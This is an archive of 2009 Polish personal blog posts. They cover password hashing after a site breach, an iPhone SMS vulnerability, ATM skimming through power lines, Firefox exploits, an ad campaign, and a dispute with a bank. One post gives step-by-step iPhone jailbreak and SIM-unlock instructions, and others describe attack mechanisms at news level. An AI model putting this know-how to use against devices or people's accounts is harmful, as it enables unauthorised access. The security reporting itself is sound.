Używanie funkcji skrótu przy zapisie haseł pomaga, ale nie eliminuje możliwości poznania hasła! Hashe można "odwrócić" za pomocą ataków brute-force (próba hashowania hasła a, aa, aaa, aab, aac, etc. i porównania wyniku z tym co w bazie) lub tzw. Rainbow Tables (czyli skorzystania z już obliczonego słownika skrótów i porównania ich przechwyconymi). Oba ataki byłyby trudniejsze, gdyby hasła użytkowników były "solone" (do hasła użytkownika, przed hashowaniem, dołączany jest prefiks). W implementacji banalne, a zdecydowanie podnosi bezpieczeństwo hasła.

6. Nie używaj tego samego hasła na różnych serwisach!!! To co prawda nie rada dla Wykopu, ale dla jego użytkowników. Jeśli używali tego samego hasła do konta pocztowego (które również jest w rękach włamywaczy) czy innego serwisu, to mają problem. Niektórym już pojawiły się niechciane przedmioty w "Kupionych" na Allegro...

Naprawdę, to nie jest trudne ułożyć sobie silne, a zarazem łatwe do zapamiętania hasło dla każdego z serwisów. Wystarczy zbudować je wg poniższego schematu:

niebieska 8!8 rekawiczka

Dwa słowa, odzielone liczbą lub znakiem specjalnym. Takie hasło jest niesłownikowe, długie, i łatwe do zapamiętania. To naprawdę najlepszy kompromis pomiędzy bezpieczeństwem a pamięcią potrzebną do przechowania hasła.

Polityka posiadania długich, losowych haseł, które w dodatku trzeba zmieniać co 2 tyg. jest w moim odczuciu głupia. Większośc użytkowników nie jest w stanie zapamiętać takiego hasła, co skutkuje tzw. słonecznikiem — czyli zapisaniem hasła na żółtej karteczce i przyklejeniem jej do monitora...

Druga strona włamania

Oprócz haseł użytkowników, z wyciekniętej bazy można dowiedzieć się innych interesujących rzeczy - chociażby adresu e-mail (prawdziwego?) administratora, który odkrywa demaskuje swój drugi biznes, a także jego hasła - porównajcie hash SHA1 dla "qwerty" wyliczony tutaj z obrazkiem poniżej:

Wyciek haseł to nie jedyny problem, bo jak widać, z bazy można wywnioskować o wiele więcej...

AKTUALIZACJA (7/9/2009)
Właściciel Wykopu opublikował swoje oświadczenie w sprawie włamania na YouTube. Niestety, nie jest ono bogate w nowe informacje.

____
* Przechwycona baza pochodzi sprzed pół roku. Dokładna data włamania nie została określona — ale jeśli wierzyć administratorom Wykopu, było to "kilka tygodni temu".

Katastrofy lotnicze - jak ich uniknąć?

Sun, 16 Aug 2009 22:06:56 +0200

Zestawienie, przedstawiająca statystycznie najniebezpieczniejsze lotniska, modele samolotów, miejsca w kabinie oraz daty lotów...

W skrócie, aby uniknąć katastrofy lotniczej, nie lataj Boeingiem 737, zwłaszcza w sierpniu i do USA. Zajmuj tylko miejsca z tyłu i wystrzegaj się linii Aeroflot. Matematka nie kłamie ;-) kliknij w obrazek, aby zobaczyć pełnowymiarową grafikę

źródło: Reddit

PS O wypadkach lotniczych już kiedyś pisałem, w kontekście telefonów komórkowych...

AdTaily - gdzie warto się reklamować?

Fri, 14 Aug 2009 09:58:49 +0200

Parę dni temu, kiedy oficjalnie wystartował Geek*FUN*, nadarzyła się dobra okazja żeby wypróbować AdTaily nie jako bloger, a jako reklamodawca.

Poprzez katalogi tematyczne wybrałem kilkanaście stron, na których umieściłem reklamę. Zaglądałem tylko do kategorii Apple, Komputer i Internet, Studenci, Młodzież, Rozrywka, bo moim zdaniem właśnie tam znajduje się target Geek*FUN*-a.

Po przejrzeniu setek blogów, wybrałem tylko i wyłącznie te, które miały jak najniższą cenę za reklamę w stosunku do raportowanej liczby odwiedzin. W końcu to test, więc po co przepłacać? Zwłaszcza, że Geek*FUN* jest totalnie nonprofitowy. Generalnie, nie brałem pod uwagę cen wyższych niż 2PLN za dzień wyświetlania reklamy.

Pozostało stworzyć odpowiednią grafikę i spersonalizować jej opis pod każdy z serwisów: "Umrzyj ze śmiechu" na emoforum.pl wyglądało moim zdaniem dość zabawnie...

Kupowanie reklam w AdTaily

Proces kupowania reklamy jest banalnie prosty... ale pojawiły się pewne problemy. Pomimo błyskawicznego zaakceptowania reklamy przez kilku blogerów, nie pokazywała się ona niektórych sajtach... Jak się okazało, winne było cache'owanie... i tu z pomocą przyszedł sharnik, który zrobił swoją magię i Geek*FUN* zaczął straszyć na wszystkich stronach.

Druga rzecz, która mnie wydała się problematyczna, to brak panelu dla osoby sprzedającej reklamy. Chciałbym widzieć statystyki dotyczące moich reklam bezpośrednio w AdTaily. Na szczęście, z tego co mi wiadomo, funkcja taka jest w planach — i całe szczęście, bo parsowanie logów http nie jest moim ulubionym zajęciem:

Trzecia sprawa, to zero opisu co do powodu refundów. Nagle dostaję zwrot X PLN, i nie wiem dlaczego. Czyżby moja reklama się nie spodobała? A może autor bloga zapił i przez trzy dni nie był w stanie zaakceptować reklamy? Blogomotive był na tyle miły, że po odrzuceniu mojej reklamy, sam wygooglał mojego e-maila i napisał, że powodem było wybranie zbyt wielu dni — ale czy wszyscy będą tacy uprzejmi? ;)

Dobra, koniec narzekania, przechodzimy do wyników kampanii ;-)

Statystyki kampanii na AdTaily

Jak widać, najwięcej kliknięć pochodzi ze wszelkiego rodzaju for dyskusyjnych, gdzie za jedną przekierowaną na naszą stronę osobę zapłacimy średnio ok. 5 groszy. Pewien serwis, którego nazwy teraz nie zdradzę, wypadł zadziwiająco dobrze - za 98 kliknięć zapłaciłem 1,5PLN, co dało genialny CPC na poziomie półtora grosza :) Kto zgadnie, o jakim serwisie mowa? Kupię mu tam reklamę na dzień ;P

Na tle reszty, rozczarowały emokidsy (ale tą niechęć można zrozumieć ;-) i fanatycy gier flashowych — ponad 80 groszy za kliknięcie w porównaniu do reszty testowanych stron to porażka. Usilnie ~~spamo~~reklamowany na blipie livespot też okazał się ...przereklamowany :)

Najkorzystniejszą cenowo opcją jest obecnie reklama na Blogomotive — ale trzeba pamiętać, że jest to tymczasowa promocja. Ciekaw jestem, czy tyle samo osób będzie chętnych na reklamę po podniesieniu stawki?

W dniu emisji reklam, liczba czytelników RSS GeekFUN-a wzrosła o 15. Pytanie, czy warto wydać ~20PLN na taki przyrost? To pozostawię Wam do rozważań ;-)

Gdzie się reklamować?

Osobiście, eksperyment z AdTaily uważam za udany — dowiedziałem się czegoś nowego o sieci i klikalności reklam przez różne grupy internautów. Wydaje mi się, że na AdTaily najlepiej sprawdzi się mimo wszystko reklama wizerunkowa. Nawet jeśli nikt nie kliknie (takich jest sporo) ale zobaczy daną kreację na kilkunastu blogach które codziennie przegląda (takich jest jeszcze więcej), efekt końcowy zostanie osiągnięty.

Wniosek? Wrzucać reklamy na popularne strony/blogi z dużą oglądalnością i nie przejmować się brakiem kliknięć. Pokuszę się o stwierdzenie, że reklama niekliknięta jest równie skuteczna, co kliknięta. Ja do teraz pamiętam reklamę Heyah, bo mimo że w nią nie kliknąłem, to widziałem ją w kilkunastu miejscach przez dłuuugi czas...

Nowy GeekFUN

Tue, 04 Aug 2009 20:43:35 +0200

Dwie ważne zmiany na Geek*FUN*.
Parę dni temu dorzuciłem nowe (lipcowe) śmiesznostki, a ikari dorobił RSS-a.

Póki co, materiału nie jest wiele, ale powoli ludzie zaczynają podsyłać coraz więcej nadających się plików. Jakiś gagatek, moment po moim blipnięciu wykupił też domenę geekfun.pl — mam swój typ, i typa pozdrawiam, ciesząc się, że już teraz są ludzie przekonani o sukcesie projektu ;-) Nie pozostaje mi nic innego, jak zaprosić Was do oglądania i do subskrybcji RSS.

PS: Moim typem na gikfan miesiąca jest klub wymagający flashplayera przy wejściu... chciaż zamieszki przed KDT z laptopem w tle też są dobre ;-)

[Krwiste!!!] Jak pozbyć się reklam z GMaila?

Sun, 02 Aug 2009 19:26:14 +0200

Jeśli w treść maila wplączesz jakieś drastyczne słowo, GMail nie pokaże "Sponsored Links" po prawej stronie e-maila.

Oto niekrwisty przykład:

A to już e-mail z antyreklamową wstawką:

BTW: Nie trzeba się wysilać na krwiste poematy — wystarcza proste "To zdanie dodaję, żeby zabić reklamy" ;-) Takie zachowanie wynika z założeń projektowych systemu reklamowego Google'a. System skanujący pocztę, nie podepnie reklam jeśli w treści e-maila wykryje "katastroficzne" określenia.

Ciekawe, czy to poprawność polityczna Google'a (nie zarabiamy na katastrofach), czy raczej ochrona wizerunku reklamodawców. W końcu kto by chciał, żeby jego marka/produkt kojarzyły się z traumatycznymi przeżyciami? ;)

PS: Żeby było jasne: nie jestem przeciwnikiem reklam, zwłaszcza w darmowych projektach, i dlatego nie zamierzam korzystać z w/w sposobu.

Zobacz także: (podobne wpisy BETA!):
-- Polish sex-ads abusing Google
-- Oops, they did it again
-- New AdSense Layout?

[via]

SMS zawieszający iPhone'a

Fri, 31 Jul 2009 12:45:32 +0200

Nieważne, czy twój iPhone jest jailbreaknięty, czy nie. Nie ważne, czy masz stary czy najnowszy firmware. I tak jesteś podatny na atak zaprezentowany przez Collina Mullinera i Charliego Millera na konferencji BlackHat.

Do tej pory, aby przejąć kontrolę nad iPhonem, należało wykorzystać bugi w Safari i namówić ofiarę do odwiedzenia odpowiednio zmodyfikowanej strony WWW — teraz wystarczy tylko poznać jej numer telefonu...

Opis ataku

Atak wykorzystuje błędy w kodzie usługi CommCenter iPhone'a. Usługa odpowiada za przetwarzanie przychodzących wiadomości SMS, działa na prawach roota i nie jest sandboksowana. Aby przejąć kontrolę nad iPhonem nalezy wysłać SMS-a z pominięciem ostatnich paru bajtów w UDH. Wysyłając kolejne SMS-y można sterować pracą iPhone'a (zgranie książki kontaktowej, propagacja ataku do kontaktów, wysyłanie spamu, wyłączenie tlefonu, etc.).

Dziura w iPhonie została odkryta metodą fuzzingu. Pominięto także sieć GMS (podpinając się przez modem), aby nie zbankrutować na koszcie wysłania ok. 500 000 testowych wiadomości SMS. Poniżej dokument opisujący atak:

Apple do tej pory nie wypuściło patcha, więc

jeśli tylko dostaniecie SMS-a z jednym, przypominającym kwadrat znaczkiem, jak najszybciej zrestartujcie iPhone'a!

Nie tylko iPhone jest podatny na smsowy atak...

Charli i Collin twierdzą, że telefony pracujące pod kontrolą systemu Android też były podatne na podobne ataki. Google zapatchowało jednak bug w przeciągu dwóch dni.

Tandem HTC & Windows Mobile też nie ustrzegł się błędów. Można "wywalić" użytkownikowi interface telefonu, o ile wyśle się kilkaset odpowiednio spreparowanych SMS-ów na jego numer — stąd, nie wydaje mi się, żeby czekała nas masowa zagłada słuchawek z Windowsem...

Przypominam także, że w styczniu głośno było o smsowych atakach na telefony Nokii pracujące pod kontrolą systemu Symbian.

Jak się chronić przed atakami SMS?

Użytkownicy iPhone'a muszą czekać na patcha od Apple'a, nic jednak nie wskazuje na to, że łatka pojawi się szybko... . Atak na Windows Mobile jest ciężki w przeprowadzeniu, więc posiadacze telefonów od HTC mogą moim zdaniem spać spokojnie. Podobnie właściciele zabawek z Androidem - system jest już załatany. Zostaje biedna Nokia, która nie posiada "łatwego" systemu automatycznej aktualizacji oprogramowania... — iPhone, prędzej czy później, po podpięciu do iTunes zostanie załatany.

Swoją drogą, ostatnio zastanawiałem się nad tym, jak powinno się podejść do automatycznej aktualizacji softu w telefonach komórkowych. Myślę, że najlepszym wyjściem byłoby stworzenie odpowiedniego protokołu przy współpracy producentów telefonów i operatorów sieci GSM (w końcu transfer danych kosztuje). To, że takie działania są realne, pokazuje kompromis producentów co do unifikacji wtyczek od ładowarek. Obawiam się jednak, że z racji kosztów, nigdy nie doczekamy się "globalnego" protokołu aktualizacji dla telefonów komórkowych... w sumie, dla mnie to nawet i lepiej ;)

AKTUALIZACJA (2.08.2009)
Apple wypuściło firmware 3.0.1, który łata dziurę w module SMS.

Hackowanie bankomatu przez gniazdko...

Thu, 30 Jul 2009 21:59:02 +0200

Okazuje się, że na nic zaawansowane i superbezpieczne HSM-y montowane w dzisiejszych bankomatach. Na nic też łatanie oprogramowania firmy Diebold, które jest wykorzystywane w większości nowych bankomatów. Próżno także szukać dodatkowej ochrony bankomatu w pryskaniu gazem na atakującego...

Dziś, na konferencji BlackHat, Andrea Barisani i Daniele Bianko zaprezentowali nową rodzinę ataków na bankomaty — skimming poprzez sieć elektryczną. Możecie już wyrzucić swoje mini-kamerki i tekturowe pudełka po butach — jest lepsza metoda, żeby wykraść czyjś PIN ;-)

Skimming przez sieć elektryczną

Zaprezentowany na konferencji sniffer do klawiatur PS/2 należy wpiąć do tej samej sieci elektrycznej w której pracuje bankomat. Sniffer przeprowadza analizę sygnału i wyłapuje uderzenia w poszczególne numerki na bankomatowej klawiaturze. Game over.

Ale pomysł nie jest nowy...

Już dwa lata temu, pisałem o podsłuchu elektronicznym (TEMPEST) i analizie sygnałów elektrycznych z np. zasilacza komputerowego. Na ich podstawie można wywnioskować czy urządzenie przeprowadza operację deszyfrowania dysku konkretnym (sic!) kluczem kryptograficznym. A jakby tego było mało, temperatura komputera, może zdradzić, którym węzłem sieci TOR jesteśmy... Tak... side-channel attacks to zdecydowanie ciekawy temat :-)

Zastanawiam się, czy teraz bankomaty będą teraz podpinane do sieci elektrycznej poprzez specjalne filtry? Proponowany przez niektórych wymóg wprowadzenia odseparowanej sieci elektrycznej dla bankomatu wydaje się nawet nie tyle kosmicznie drogim rozwiązaniem, co zupełnie oderwanym od rzeczywistości. (Jest co prawda jeszcze bardziej kosmiczna wizja: własny agregat prądotwórczy dla każdego bankomatu i ekranowanie pomieszczenia w którym stoi za pomocą klatki Faraday'a, albo innego TEMPEST-u... ;-)

Sprawę mogłyby po części rozwiązać ekrany dotykowe... ale wtedy przecież otwieramy się na nową grupę ataków, np. kamerą termowizyjną albo wspomnianym wcześniej podsłuchem ulotu magnetycznego:

a) obraz z monitora
b) obraz powstały z analizy ulotu magnetycznego na urządzeniu oddalonym od monitora o kilkadziesiąt metrów
c) nałożenie filtrów ułatwiających odczyt podsłuchiwanego ekranu

I co tu zrobić, co, żeby bezpieczniej było, i żeby PIN nie zginął?
Macie jakieś pomysły?

Iphone 3GS: jailbreak, zdjęcie simlocka i aktywacja

Thu, 30 Jul 2009 12:18:55 +0200

Wczoraj dostałem od M. iPhone'a 3GS :-)

Aktywacja w polskiej sieci GSM (testowałem Plus i Era) oraz zdjęcie simlocka poszły gładko. Podobnie jailbreak.

Poniżej krótkie HOWTO i recenzja dla osób, które pewnie niebawem staną przed podobnymi problemami - iPhone 3GS ma się bowiem na dniach oficjalnie pojawić w Polsce :)

Spis treści:
• Aktywacja iPhone'a 3GS
• Jailbreak iPhone'a 3GS
• Zdjęcie Simlocka w iPhonie 3GS
• Krótka recenzja iPhone'a 3GS

Aktywacja iPhone 3GS w polskiej sieci (Plus GSM)

W moim przypadku, iPhone 3GS dotarł z brytyjską kartą SIM O2. Dopiero po jej włożeniu i podpięciu do iTunes pojawił się HomeScreen na telefonie. Wcześniej, telefon był bezużyteczny - (Komunikat: Insert valid SIM card). Niestety, bez "oficjalnie dopuszczonej przez Apple" karty, nie da się dostać do telefonu.

Po pojawieniu się HomeScreenu, można przystąpić do krzywdzącego BTS-y (hehe) zdobywania roota na telefonie, czyli rozpocząć jailbreakowanie.

Jailbreak iPhone'a 3GS (redsn0w)

Ściągnij firmware w wersji 3.0 (7A341) ze strony Apple.
Ściągnij aplikację redsn0w 0.8 dla Maca lub Windows
Sprawdź na jakiej wersji oprogramowania obecnie działa twój iPhone 3GS (Settings->General->About->Version). Jeśli jest to 3.0 (7A341) przejdź do następnego kroku. Jeśli nie, najpierw będziesz musiał wgrać ten firmware na swój telefon. W tym celu podepnij go do iTunes, i trzymając wciśnięty shift (lub option) kliknij na "Restore" i wskaż plik z firmwarem, który ściągnąłeś w punkcie pierwszym.
Odpal redsn0w i wskaż plik z firmwarem ściągnięty w punkcie pierwszym. Kliknij "next" i upewnij się, że "Install Cydia" jest zaznaczone. Kliknij "next".
Redsn0w poinstruuje Cię teraz, jak wprowadzić iPhone 3GS w tryb "recovery": odłącz telefon od komputera i wyłącz go. Po pięciu sekundach wciśnij przycisk HOME na telefonie i trzymając HOME podłącz telefon do komputera. Nie puszczaj Home'a, dopóki na ekranie telefonu nie pojawi się obrazek z instalacją.
Po instalacji iPhone 3GS zrestartuje się, po czym rozpocznie proces "patchowania" systemu ;-)

Gotowe - twój iPhone 3GS jest jailbreaknięty!

Gdybyś miał problemy z powyższym sposobem, alternatywą jest skorzystanie z programu purplera1n, wypuszczonego przez inną osobę.

Jak zdjąć simlock z iPhone'a 3GS? (ultrasn0w)

UWAGA! Zdjęcie simlocka jest możliwe tylko po uprzednim jailbreaknięciu iPhone'a.

Aby zdjąć simlocka z iPhone'a 3GS wykorzystamy aplikację ultrasn0w, którą zainstalujemy z Cydii.

Otwórz aplikację Cydia. Kliknij na "Manage", potem "Sources", potem "Edit" i na końcu "Add"
Wpisz http://repo666.ultrasn0w.com/ i kliknij na "Add Source"
Po powrocie do Cydii i zaakceptowaniu zmian, kliknij na dopiero co wprowadzoną nazwę, a Twoim oczom ukaże się aplikacja ultrasn0w. Kliknij na nią i zainstaluj.

Po instalacji ultrasn0w, telefon zrestartuje się i nie będzie już SIM-locka ;-)

Mamy już zaktywowanego, "jailbreakniętego" iPhone'a 3GS ze zdjętym SIM-lockiem. Pora na recenzję i opis nowości... ale to wrzucę dopiero wieczorem ;-)

Lifehacking: oglądanie filmów w samolocie

Mon, 27 Jul 2009 20:37:21 +0200

Kiedy lecę samolotem, iPhone staje się nieodłącznym towarzyszem podróży. Używam go głównie do oglądania filmów. Niestety, po kilkudziesięciu minutach, oglądanie "z ręki" staje się męczące... i właśnie wtedy do akcji wkracza rzygotorebka! ;)

Na ekranie fragment Diggnation, które nota bene podsunęło mi ten pomysł :-) Chwila wyrywania, dziurka na słuchawki i gotowe. Rozprostowany spód torebki służy jako regulacja kąta nachylenia ekranu.

PS tak, jestem hardkorem, flight mode is off. Dlatego.

Gaz pieprzowy w bankomacie

Tue, 21 Jul 2009 20:36:45 +0200

Absa, jeden z afrykańskich banków wpadł na pomysł wyposażenia swoich bankomatów w miotacze gazu pieprzowego... Gaz ma zapobiegać skimmingowi, czyli próbom manipulacji przy konstrukcji bankomatu celem sczytania danych karty. Problem w tym, że ostatnio miotacze zostały przypadkowo uaktywnione przez pracujących przy bankomacie techników, a opary gazu przedostały się do reszty centrum handlowego, w którym stał bankomat. Skończyło się przyjazdem karetki...

Agresywne bankomaty?

Niedawno pisałem o polskich "skimmerach" korzystających z tekturowych kart kredytowych. W komentarzach padł dość kontrowersyjny pomysł, że "bankomat powinien sprawdzać, czy karta jest oryginalna (wykonana z plastyku)". Cieżko powiedzieć, czy wprowadzany w Afryce system jest w stanie poddawać testom wkładane do bankomatu karty, ale na pewno byłoby to miłe rozszerzenie...

Póki co, wiadomo, że afrykański bank opiera swoje rozwiązanie o analizę obrazu z kamery umieszczonej w bankomacie, a obserwującej wejście na karty. Brzmi jak synonim dla "ławe do oszukania" (por. z postem dot. oszukiwania systemów rozpoznawania twarzy na lotniskach)

A może kopniak w jaja?

Zastanawiam się, jakie alternatywne środki ochrony mogłby zostać użyte w bankomatach? Porażenie prądem (po uprzednim zroszeniu wodą, dla lepszego efektu)? A może staropolski kopniak w jaja? Oba rozwiązania są chyba równie "pomysłowe" jak gaz pieprzowy...

Mam tylko nadzieję, że już niebawem nie będę musiał przed skorzystaniem z bankomatu zakładać maski przeciwgazowej, ochraniaczy na krocze i gumowych rękawiczek...

PS O tym temacie pisałem już wczoraj na Blipie — właśnie dlatego warto mnie tam obserwować... ;)

Exploity na Firefox 3.5.1 (i inne przeglądarki)

Sun, 19 Jul 2009 23:08:13 +0200

Od poniedziałku, na milw0rmie dostępny jest exploit na Firefoksa 3.5. Exploit pozwala na zdalne uruchomienie dowolnego kodu na komputerze ofiary. Tu możecie sprawdzić jego działania — po kliknięciu odpali się kalkulator Windows.

Autoexploit?

Nie pierwszy, i na pewno nie ostatni to raz, kiedy pojawia się exploit na Firefoksa — ciekawe w tym przypadku jest coś innego... Po analizie kodu exploita, jeden z developerów Firefoksa przyznał, że programiści FF najprawdopodobniej pomogli w stworzeniu exploita, gdyż nie ukryli na czas informacji o dziurze, dodanej do Bugzilli już w czwartek... (BTW: Napisz proszę w komentarzu do tego posta, czy powinno się ukrywać opisy błędów bezpieczeństwa?)

Dopiero w piątek (po tygodniu od wykrycia błędu, i po 4 dniach od 0day'a) wypuszczona została załatana wersja Firefoksa - łatajcie się bracia i siostry!

Przy okazji poprawiono błąd związany z długaśnym startem FF pod Windowsem wynikający z nie do końca przetestowanej implementacji funkcji kryptograficznych. Jak podaje heise, znalazca tego błędu twierdzi, że developerzy FF niezbyt dokładnie przetestowali build Windowsowy z racji tego, że głównie pracują na Linuksie... ;)

Dość o Firefoksie, bo jeszcze ktoś pomyśli, ze jest lepszy od Opery ;-P Teraz pora dać klapsa właśnie Operze ;)

Dziadek exploit

Firma G-Sec odgrzewa atak znany z czasów Netscape 6, polegający na stworzeniu menu z selectem o parametrze lenght ustawionym na kosmicznie wielką wartość. Exploit powoduje alokowanie całości dostępnej pamięci i zwis przeglądarki. Wywala Opery i IE. FF/Chrome i Safari nie są podatne na atak.

Tutaj możecie go przetestować.

Jak widać, exploity dosięgają wszystkich przeglądarek ;-) Miłego zabijania!

P.S. W temacie exploitów - gorąco polecam tę grę.

AKTUALIZACJA: 19.07.2009, 23:45

Branch Predictor słusznie zauważył w komentarzu, że w ledwie co zaktualizowanym Firefoksie 3.5.1 także znaleziono buga — tutaj macie PoC — wywala też Operę i Safari na OS X, więc chyba tylko medialnie nazwano to "nową dziurą w nowym FF" ;)

mBank "TY P*ZDO"!

Tue, 14 Jul 2009 21:41:40 +0200

Obrazek powyżej został zaciemniony na prośbę pracownika mBanku

Parafrazując tytuł Kominka, mam na myśli, że mBank mnie ostatnio straszliwie wkur...ił, a użytkownicy Blipa i Twittera pomogli wyjść z opresji ...a było to tak:

mBank Olsztyn - 10 marca 2009, dzień pierwszy

Jestem w delegacji. Korzystając z wolnego popołudnia składam w tamtejszej placówce mBanku (Centrum Handlowe Alfa) wniosek o kartę kredytową (bo z mojej obecnej karty strasznie upierdliwie korzysta się w Polsce). Po wypełnieniu wniosku, zostaję poinformowany, że jak tylko dane zostaną zweryfikowane, ktoś do mnie zadzwoni i umówi się na podpisanie umowy kredytowej... Myślę sobie, załatwione — skoczę jeszcze po colę i wracam do hotelu.

Po kilkunastu minutach, już po przebyciu drogi do hotelu, w momencie wskakiwania do wygodnego łóżka, dzwoni telefon. Mój wniosek o kartę kredytową został właśnie rozpatrzony pozytywnie, a dokumenty są gotowe do podpisania. Ponieważ hotelowe łóżko wydaje się o wiele ciekawszą perspektywą od powrótu do centrum handlowego Alfa, grzecznie odpowiadam pani z mBanku, że nasze spotkanie będzie możliwe dopiero jutro ...i spokojnie zasypiam, planując na jutro wycieczkę do mBanku, zaraz przed wyjazdem z Olsztyna.

Niestety, następnego dnia na własnej skórze przekonuję się ile trzeba czekać na olsztyńskiego taksówkarza (mimo że miasto jest tak wielkie, że gdyby pokryć je wykładziną dałoby radę odkurzć je w pięćdziesiąt minut ;-)). Ostatnie pół godziny, które miałem przeznaczyć na wycieczkę do mBanku spędzam więc wyglądając taksówkarza i nie starcza już czasu na podjechanie do mBanku...

mBank Kraków - dzień drugi

Wybieram się na Karmelicką do mBanku, gdzie dowiaduję się, że krakowscy pracownicy nie mogą ściągnąć danych z wniosku złożonego w Olsztynie i niestety, trzeba będzie wypełnić go jeszcze raz. Wszyscy są uprzejmi i przepraszają mnie na każdym kroku. Ponownie poświęcając kilka minut na wypełnienie potrzebnych umów, dowiaduję się, że zostaną one przesłane do placówki do Olsztyna, a po ich otrzymaniu mBank wyśle mi kartę w ciągu tygodnia.

Mija pierwszy miesiąc... (mBank Kraków)

Po przeszło miesiącu, karty dalej nie posiadam. Ale ciągłe otwieranie skrzynki na listy w poszukiwaniu przesyłki od mBanku ma swoje plusy — zamek przestał się zacinać... ;-)

Rozumiem obsuwy, przekraczanie nieprzekraczalnych deadline'ów deadline'owych, ale tyle czasu bez żadnego telefonu o co kaman!? mBank lekko przegina... Odczekuję dodatkowe 2 tygodnie (bo łagodny jestem i cierpliwy) i przystępuję do przebijania się przez durne formularze na mLinii, gdzie składam pierwszą reklamację. Parę dni później dzwoni jakaś kobieta, która strasznie mnie przeprasza i tłumaczy, że moje dokumenty się przeterminowały (sic!) i musiały zostać przeniesione do archiwum.

Jak to przeterminowały!? Jakiego k... archiwum!?

Według mBankierki z telefonu, podpisana przeze mnie umowa była ważna tylko przez 2 tygodnie. WTF!? W ciągu tych dwóch tygodni, trafiła co prawda do centrali, ale z przyczyn od nikogo niezależnych, musiała zostać przeniesiona do tajemniczego archiwum mBanku. WTF!? x 2.

Podejrzewam, że łosie zgubiły mój wniosek i żeby to sprawdzić, proszę o wyciągnięcie z archiwum i odesłanie mi oryginału dokumentów. Prośbę motywuję tym, że umowa zawiera moje dane osobowe i inne wrażliwe informacje i nie została zrealizowana, ba! mBank twierdzi nawet, że jest przeterminowana. Tym wybijam panią ze "skryptu", który miała na ekranie monitora, z czego jestem dumny, ale po chwili zaczynam żałować, bo pani przechodzi w tryb automatu, który na każde moje pytanie odpowiada tylko to: "procedury nie pozwalają na wyjęcie dokumentów z archiwum, ale proszę być pewnym, że pańskie dane sa u nas bezpieczne". Bezpieczne my ass!

No cóż, myślę sobie, pozostało mi chyba jedynie życzyć jakichś krwistych hemoroidów komuś z mBanku... komuś, kto zapewne zastanawiając się jakby tu wydymać kolejnych klientów na opcjach walutowych, przysłonił sobie na dwa tygodnie moją umowę najnowszym wydaniem książki pt. "ABC zajebistego bankiera. Część II - jak profesjonalnie oszukać klienta".

Po chwili mBankierka wyskakuje z pętli i obiecuje, że załatwi, żeby wszystko było już dla mnie bardzo przyjemne, że skontakuje się ze mną jakiś pracownik krakowskiego mBanku i umówi na ekspresowe ponowne-ponowne wypełnienie dokumentów.

I faktycznie, wieczorem dzwoni jakiś osobnik, który jąkając się i dukając w tempie wolniejszym od najwolniejszej osobówki PKP "pędzącej" po centralnej magistrali kolejowej, stara się niedołężnie wytłumaczyć i przeprosić za całą sprawę. I tu sam pod sobą dołek wykopał, bo z każdym jego słowem, przypominałem sobie to, przez co przeszedłem w ostatnim miesiącu, a podczas tego mojego przypominania, złość we mnie narastała, a krew zalewała. Wierzcie mi, że próbowałem z nim wypełnić ten cholerny wniosek po raz trzeci... ale ponieważ facet ze zdania na zdanie doskonalił swoje techniki jąkodukania, a mnie przestały bawić nagminne prośby o powtórzenie ostatniego słowa, zaproponowałem spotkanie.

Miesiąc i dwa tygodnie później. (wciąż mBank Kraków)

Na wyznaczoną godzinę przybywam do krakowskiego mBanku. Po 10 min. stania w kolejce i przyglądania się jak jedyny obecny na miejscu pracownik mBanku stara się zademonstrować jakiejś kobiecie jak korzysta się z bankomatu, wiem już, że najprawdopodobniej absurd szybko nie zniknie z powietrza i raczej niczego dziś nie załatwię.

Moje prorocze wizje sprawdzają się już po paru minutach, kiedy to okazuje się, że "powolniaka" z którym się umówiłem nie ma, ale postarają sie znaleźć kogoś, kto się mną zajmie... i faktycznie po 20 (sic!) minutach, pojawia się ktoś z umową i szczęśliwie oznajmia mi, że wystarczy tu podpisać i to wszystko. Na jego nieszczęście, na pierwszej stronie w oczy kłuje mnie niepoprawny adres zameldowania (skąd oni go wzięli?!). Wskazuję błąd, a mBankierowi uśmiech z twarzy spada. Znika więc poprawić i wydrukować umowę jeszcze raz...

Po kolejnych 20 minutach, w których to tysiąc razy zdążyłem przeanalizować z jaką prędkością kątową należałoby obracać rolki w drukarce, żeby przypadkiem nie zadrukować więcej niż dwie strony papieru w 20 min, pracownik mBanku pojawia się z powrotem. Składam podpisy i przeżywam deja vu - "To wszystko, karta za tydzień powinna być w Pana skrzynce na listy".

Mija kolejny miesiąc (dalej mBank Kraków)

Jest 23 czerwca. Prawie cztery (sic!) miesiące od mojego pierwszego kontaktu z mBankiem w sprawie karty. Odbieram telefon od mojego ulubionego "powolniaka" z mBanku, który znów zaczyna od pooooowooolneeeegooo przypomnienia mi całej mojej traumatycznej historii kontaktów z mBankiem (czyżby mieli szkolenia z technik anty-NLP?). Po jego ślimaczym głosie już wiem, że coś znów poszło nie tak, ale nie spodziewam się, że pajac będzie na tyle bezczelny, żeby powiedzieć mi co następuje: "Popełniliśmy błąd, w Pana wniosku znalazł się inny adres zameldowania, niż ten który Pan posiada. Sugeruję zalogować się do mBanku i zmienić w ustawieniach konta adres zameldowania na ten, który Panu podyktuję".

Tu dostaję autentycznej kur...cy!

Czuję, że właśnie pobiłem rekord Księgi Guinessa, bo chyba nie ma drugiej istoty we wszechświecie, która spotkała się z taką ilością absurdu przy wydawaniu kawałka pieprzonego plastiku. Pohamowując wulgaryzmy, grzecznie acz stanowczo opierdzielam faceta, dobierając tak kwieciste epitety, że na dobre 5 min. mojego koncertu, składającego się z naprzemiennego wyliczania niekompetencji mBanku w ostatnich 4 miesiącach i porównywania inteligencji pracowników mBanku do peruki Michaela Jacksona, wszyscy w firmie rzucają robotę i zaczynają się przysłuchiwać mojej rozmowie.

Chwilę później spędzam 30 min na mLinii, skłądając drugą reklamację na skandaliczne zachowanie pracowników mBanku oraz dając mBankowi ultimatum, że jeśli nie skontaktuje się ze mną jakaś normalna osoba i nie złoży mi jakiejś satysfakcjonującej propozycji, to nie tylko napiszę do Komisji Nadzoru Finansowego, ale również złożę skargę do UOKiK i GIODO w sprawie zagninionych dokumentów zawierających moje dane osobowe i inne wrażliwe informacje. Reklamacja zostaje przyjęta (ale nie bez problemów, w trakcie jej spisywania, operatorowi mLinii zrestartował się komputer — gorąco polecam dźwięk startu Windowsa w trakcie stanu poddenerwowania, możecie sobie wyobrazić jak złagodził mi nastrój...).

Dzień później. (mBank Kraków)

Dostaję telefon od pracownika mBanku, który informuje mnie, że rozpatruje moją reklamację... I teraz najlepsze:

Jak się okazuje, reklamację rozpatruje ten sam człowiek, na którego złożyłem skargę za namawianie mnie do zmiany adresu!

